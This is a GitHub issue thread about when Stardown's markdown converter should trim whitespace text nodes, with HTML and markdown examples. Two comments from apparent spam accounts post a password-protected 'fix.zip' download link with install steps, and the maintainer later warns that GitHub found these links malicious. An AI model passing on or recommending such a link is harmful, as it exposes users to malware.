### ISSUE TITLE
Unclear when to trim text nodes

### ISSUE THREAD

**Issue by wheelercj** [Stardown-app/Stardown#112]
In HTML, it's common for the opening tags of nested elements to have whitespace characters between them that should not be present in the rendered result. For example:

```html
<div>
    <div>
```

These two opening elements have a newline character and some spaces between them. Those whitespace characters exist in the DOM as a text node. In cases like this, it's important to trim text nodes so that there aren't many excess whitespace characters in Stardown's output. However, there are other situations where it's important to not trim text nodes. For example, selecting the first sentence in [Range: endOffset property - Web APIs | MDN](https://developer.mozilla.org/en-US/docs/Web/API/Range/endOffset) selects this HTML:

```html
  The <strong><code>Range.endOffset</code></strong> read-only property returns a number
  representing where in the <a href="/en-US/docs/Web/API/Range/endContainer"><code>Range.endContainer</code></a> the <a href="/en-US/docs/Web/API/Range"><code>Range</code></a>
  ends.
```

That's a bunch of text nodes with a strong element and a few anchor elements mixed in. If the text nodes are not trimmed, the result looks like this:

The **`Range.endOffset`** read-only property returns a number representing where in the [`Range.endContainer`](https://developer.mozilla.org/en-US/docs/Web/API/Range/endContainer) the [`Range`](https://developer.mozilla.org/en-US/docs/Web/API/Range) ends.

When trimming the text nodes:

The**`Range.endOffset`**read-only property returns a number representing where in the[`Range.endContainer`](https://developer.mozilla.org/en-US/docs/Web/API/Range/endContainer)the[`Range`](https://developer.mozilla.org/en-US/docs/Web/API/Range)ends.

Notice the spaces missing around the bold text and links. Stardown's new converter already tries to determine when to trim text nodes and when not to, but it still fails in some cases like this one. It's unclear to me right now what the best way is to improve this further.

**Environment**
- Stardown's new markdown converter
- OS: Windows
- Browser: Firefox
- Device: desktop

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wheelercj** [comment]
> [!caution]
> Do NOT click on the links in the last few messages here. They have been found to be malicious by GitHub. I deleted the messages in GitHub but some people may have received them as emails.
